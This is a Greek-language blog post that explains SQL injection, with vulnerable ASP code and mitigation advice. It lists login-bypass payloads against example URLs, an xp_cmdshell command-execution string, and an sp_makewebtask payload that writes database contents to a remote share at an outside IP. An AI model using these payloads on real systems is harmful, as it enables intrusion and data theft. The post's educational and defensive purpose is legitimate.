SQL Injection – hacking websites και όχι μόνο
Entry posted by Blackman ·
1978 views
Ξεκινάω το συγκεκριμένο post για να δείτε πως γίνεται το hack που ονομάζεται SQL Injection, καθώς επίσης και διάφοροι τρόποι που προτείνονται για να αποφευχθεί κάτι τέτοιο και διάφορα άλλα. Σκοπός μου είναι να δώσω την εικόνα του συγκεκριμένου hack, αλλά αν θέλετε να μάθετε να το κάνετε θα πρέπει να το ψάξετε περισσότερο μόνοι σας.
Τι είναι SQL Injection attack
Όπως μπορείτε να βρείτε και στο Wikipedia, μιλάμε για μία τεχνική η οποία εκθέτει αδυναμίες στην ασφάλεια (security vulnerability exploit) μίας βάσης δεδομένων. Η συγκεκριμένη ‘τρύπα’ έχει να κάνει με το τρόπο που φιλτράρονται οι χρήστες ή γιατί τα usernames δεν είναι strongly typed. Οι επιθέσεις αυτές είναι επίσης γνωστές και ως SQL Insertion attacks.
Μόλις ο hacker αποκτήσει πρόσβαση, τότε μπορεί να εκτελέσει ότι query θέλει πάνω στην βάση δεδομένων. Συνεπώς και να τραβήξει ή να αλλάξει όποια πληροφορία θέλει.
SQL Injection FAQ
Ε:Τι χρειάζεται κάποιος για να κάνει την παραπάνω επίθεση;
Α:Απλά έναν web browser.
Ε:Τι πρέπει να ψάξει για να κάνει κάποιος τη συγκεκριμένη επίθεση;
Α:Σελίδες που επιτρέπουν την εισαγωγή δεδομένων όπως login page, search page, feedback κλπ. Μερικές φορές ακόμα και HTML σελίδες χρησιμοποιούν POST εντολές για να στείλουν τις σχετικές παραμέτρους σε κάποια σελίδα ASP. Οπότε σε αυτή την περίπτωση δεν θα δείτε τις παραμέτρους αυτές στην URL, αλλά μόνο αν ελέγξετε τον source code και ψάξετε και βρείτε το σημείο “FORM” μέσα στον κώδικα πχ
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Οτιδήποτε υπάρχει μεταξύ FORM & /FORM είναι πιθανές παράμετροι που θα μπορεί κάποιος να χρησιμοποιήσει.
Ε:Τι γίνεται αν δεν βρίσκουμε σελίδα που να δέχεται εισαγωγή δεδομένων;
A:Θα πρέπει να ψάξετε σελίδα ASP, JSP, CGI ή PHP. Αυτό που θα πρέπει να ψάχνει κάποιος είναι σελίδες όπως:
http://autoexec.gr/index.asp?id=10
E:Πως θα δοκιμάσουμε αν υπάρχει ‘τρύπα’
A:Δοκιμάστε να γράψετε hi' or 1=1--
αυτό μπορεί να είναι στο Login, στο Password ή ακόμα και την URL
πχ http://autoexec.gr/index.asp?id=hi' or 1=1--
E:Αλλά γιατί ' or 1=1--;
Α:Πέραν του ότι μπορεί να γίνει bypass το login, είναι πιθανόν να δει κάποιος επιπλέον πληροφορίες που συνήθως δεν είναι διαθέσιμες. Αν πχ παμε σε μία σελίδα που έχει link σε μία άλλη σελίδα όπως http://autoexec.gr/index.asp?category=hardware
Βλέπουμε ότι στο URL η μεταβλητή είναι το category, ενώ το hardware είναι η τιμή για την μεταβλητή. Αυτό που πλευρά κώδικα θα εμπεριέχει κώδικα σαν και τον παρακάτω:
v_cat = request(“category")
sqlstr=”SELECT * FROM hardwr WHERE PCategory=’” & v_cat & “’”
set rs=conn.execute(sqlstr)
Έτσι με το παραπάνω το SQL που ουσιαστικά αντιστοιχεί τον συγκεκριμένο κώδικα μπορεί να γίνει:
SELECT * FROM hardwr WHERE PCategory=’hardware’
όπου το query θα φέρει πίσω αποτελέσματα για το hardware.
Οπότε σε αυτή την περίπτωση αν πάρουμε το url
http://autoexec.gr/index.asp?category=hardware' or 1=1--
Τώρα η μεταβλητή v_cat αντιστοιχεί στο "hardware' or 1=1--", οπότε αν το βάλουμε αυτό σε SQL query, θα έχουμε
SELECT * FROM hardwr WHERE Pcategory=’hardware’ or 1=1--‘
Τι έχουμε σε αυτή την περίπτωση; Ότι το query θα μας φέρει τα πάντα από τον πίνακα hardwr ασχέτως αν είναι ίσο με το hardware ή όχι. Η διπλή παύλα (--) λέει στον MS SQL server να αγνοήσει το υπόλοιπο query, το οποίο με την σειρά του θα παρατήσει το τελευταίο quote (‘). Μερικές φορές η διπλή παύλα μπορεί να αντικατασταθεί με το σύμβολο της δίεσης (#).
Παρόλα αυτά όμως, αν δεν είναι SQL server ή δεν μπορείς (ή δεν θες) να αγνοήσεις το υπόλοιπο query, μπορούμε επίσης να δοκιμάσουμε να βάλουμε
‘ or 'a'='a
Οπότε το SQL query θα γίνει:
SELECT * FROM hardwr WHERE PCategory=’hardware’ or ‘a’=’a’
Και θα έχουμε το ίδιο αποτέλεσμα.
Αντίστοιχα μπορείτε να δοκιμάσετε
‘ or 1=1--
“ or 1=1--
or 1=1--
‘ or ‘a’=’a
“ or “a”=”a
‘) or (‘a"=‘a
E:Μπορώ να αποκτήσω δυνατότητα απομακρυσμένη εκτέλεσης με SQL Injection;
Α:Οι χρήστες SQL και δη οι developers, γνωρίζουν ότι ο SQL είναι ένα πολύ δυνατό εργαλείο και αυτό γιατί τους δίνει την δυνατότητα να κάνουν ΤΑ ΠΑΝΤΑ σε ένα σύστημα. Έτσι, επειδή ο SQL Server τρέχει σαν SYSTEM, αυτό σημαίνει ότι τα δικαιώματα που έχει είναι επιπέδου administrator στο σύστημα. Οπότε εύκολα από την στιγμή που μπορούμε να τρέξουμε ότι θέλουμε, με την χρήση stored procedures (που είσαι Αντώνη
'; exec master..xp_cdmshel ‘ping 10.10.1.2'--
Σε περίπτωση που το μονό quote δεν δουλεύει, χρησιμοποιήστε διπλό.
Το ερωτηματικό στην αρχή (η semi colon όπως το λένε στα ξένα) θα τερματίσει το SQL query που εκτελείται εκείνη την ώρα και θα μας επιτρέψει να ξεκινήσουμε μία νέα εντολή SQL. Για την επιβεβαίωση ότι η εντολή εκτελέστηκε σωστά μπορούμε να πάρουμε απάντηση από ping στην IP για να δούμε αν υπάρχει κάποιο πακέτο από τον server:
#tcpdump icmp
Αν δεν πάρουμε απάντηση από το Ping (που λέγετε Pong), και έχουμε μήνυμα λάθους που σχετίζεται με δικαιώματα, τότε πιθανόν ο administrator έχει περιορίσει την εκτέλεση των stored procedures στον Web User.
E:Πως μπορώ να πάρω το αποτέλεσμα του query μου;
Α:Με την χρήση του sp_makewebtask:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMAS.TABLES"
αλλά να έχετε υπόψη ότι ο φάκελος SHARE που θα βρίσκεται στην IP που θέλουμε πρέπει να έχει sharing pemissions σε Everyone.
Φυσικά υπάρχουν απαντήσεις και σε άλλα ερωτήματα όπως να πάρουμε αποτελέσματα από μία βάση με την χρήση μηνυμάτων λάθους από ODBC ή πως να τραβήξουμε όλα τα ονόματα στηλών από ένα πίνακα, ή πως τραβάμε ότι data θέλουμε, πως να βάλουμε δικά μας data κλπ
Οπότε καταλαβαίνετε ότι η όλη διαδικασία είναι μεγάλη και φυσικά άμεσα συνδεδεμένη με αυτό που κάνει και ένας developer. Αν για κάποιους δεν σας λένε τίποτα, σίγουρα για άτομα όπως ο Αντώνης του λένε πολλά.
Αν θέλετε να μάθετε περισσότερα για SQL Injection δείτε τα παρακάτω…
http://projects.webappsec.org/SQL-Injection
http://msdn.microsoft.com/en-us/library/ms161953.aspx
http://en.wikipedia.org/wiki/SQL_injection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/#LineCommentAttacks
http://geniushackers.com/blog/2009/04/08/sql-injection-ultimate-method-for-website-hacking/
ΠΩΣ ΑΠΟΦΕΥΓΟΥΜΕ SQL INJECTIONS.
Αν διαβάσετε τα παραπάνω θα πάρετε και μία εικόνα για το πρέπει να κάνετε ώστε να αποφύγετε τι ‘κακοτοπιές’ και συνεπώς να μην πέσετε θύμα μίας επίθεσης με SQL Injection. Αλλά θα αναφέρω και κάποια πράγματα και εγώ.
Φροντίστε να ‘βγάλετε’ (εσείς ή κάποιος developer) εκτός χαρακτήρες όπως quotes, slash, backslash, semi colon, NULL, new line, κλπ και αυτά πρέπει να βγουν από τα εξής:
1) εισαγωγή από χρήστες σε πεδίο
2) παραμέτρους στην URL
3) Τιμές από cookies
Επίσης κάτι άλλο που προτείνεται είναι το να βεβαιωθείτε ότι όλα τα νούμερα έχουν μετατραπεί σε integer. Επίσης διαγράψτε stored procedures που δεν σας αρέσουν και δεν χρειάζεστε όπως master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask .
ΓΕΝΙΚΑ ΣΥΜΠΕΡΑΣΜΑΤΑ
Η χρήση SQL Injection καταλαβαίνετε ότι δεν είναι κάτι απλό. Είναι πιθανότατα ένα από τους πιο δυνατούς τρόπους για να κάνει κάποιος hacking και επίσης είναι ο πιο απλός καθώς δεν χρειάζεται ιδιαίτερα εργαλεία, αλλά μονάχα ένας web browser. Από εκεί και πέρα αν κάποιος έχει τις απαραίτητες γνώσεις μπορεί να αποκτήσει πλήρης πρόσβαση στο μηχάνημα, πέραν από τα δεδομένα που μπορεί να έχει η βάση δεδομένων. Αυτό που καταφέρνει να κάνει κάποιος ουσιαστικά είναι να ‘κοροϊδέψει το σύστημα και να του δώσει όλες τις πληροφορίες που ζητάει, και καταλαβαίνετε εύκολα ότι αν το συγκεκριμένο attack συνδυαστεί με Google Hacking η ζωή του επίδοξου hacker γίνεται ακόμα πιο εύκολη.
Ελπίζω με το παραπάνω να πήρατε μία εικόνα για το τι είναι αυτή η μορφή επίθεσης, οπότε να πάρετε και τα μέτρα σας (όσοι χρειάζεται).
Επιπλέον Links
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
7 Comments
Recommended Comments